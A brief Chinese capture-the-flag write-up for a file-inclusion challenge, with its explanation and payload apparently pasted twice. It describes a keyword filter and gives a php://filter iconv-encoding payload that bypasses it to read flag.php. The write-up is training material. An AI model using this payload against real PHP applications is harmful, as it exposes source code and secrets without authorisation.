题1 攻防世界 题目名称-文件包含
"do not hack!"应该是不能有特殊词,经过调试,发现"base64"、"string"、"read" 等都不能存在paylode里,否则就会显示“do not hack”
考虑利用iconv进行编码
payload:?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php
"do not hack!"应该是不能有特殊词,经过调试,发现"base64"、"string"、"read" 等都不能存在paylode里,否则就会显示“do not hack”
考虑利用iconv进行编码
payload:?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php